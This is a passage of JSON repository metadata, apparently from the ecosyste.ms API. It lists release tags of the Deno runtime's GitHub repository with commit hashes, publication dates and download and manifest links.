s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.